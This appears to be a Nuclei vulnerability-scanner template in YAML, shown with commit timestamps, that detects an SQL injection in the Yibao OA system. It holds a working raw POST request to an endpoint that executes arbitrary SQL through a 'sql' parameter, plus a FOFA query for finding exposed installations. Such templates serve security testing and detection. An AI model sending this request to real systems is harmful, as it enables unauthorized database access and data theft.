nuclei-templates/http/vulnerabilities/other/yibao-sqli.yaml

40 lines
1000 B
YAML
Raw Normal View History

2023-12-04 07:24:28 +00:00
id: yibao-sqli
info:
2023-12-04 18:05:55 +00:00
name: Yibao OA System - SQL Injection
2023-12-04 07:24:28 +00:00
author: DhiyaneshDK
severity: high
metadata:
max-request: 1
2023-12-04 18:05:55 +00:00
verified: true
2023-12-04 07:24:28 +00:00
fofa-query: product="顶讯科技-易宝OA系统"
2023-12-04 18:05:55 +00:00
tags: yiboo,oa,sqli
2023-12-04 07:24:28 +00:00
variables:
num: "999999999"
http:
2023-12-04 18:05:55 +00:00
- raw:
- |
POST /api/system/ExecuteSqlForSingle HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
token=zxh&sql=select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','{{num}}')),3,32)&strParameters
2023-12-04 07:24:28 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2023-12-04 18:05:55 +00:00
- 'data":"{{md5({{num}})}}'
2023-12-04 07:24:28 +00:00
- type: word
part: header
words:
2023-12-04 18:05:55 +00:00
- application/json
- type: status
status:
- 200
# digest: 4b0a00483046022100c44d508d8e3f1405db9dca09b949be03cb4e182abd5b70d263e7ebd7c5f0c645022100803decdc9cdb325e2b3c2ebf1a73cabf21099975448095921490dafaa0453fcb:922c64590222798bb761d5b6d8e72950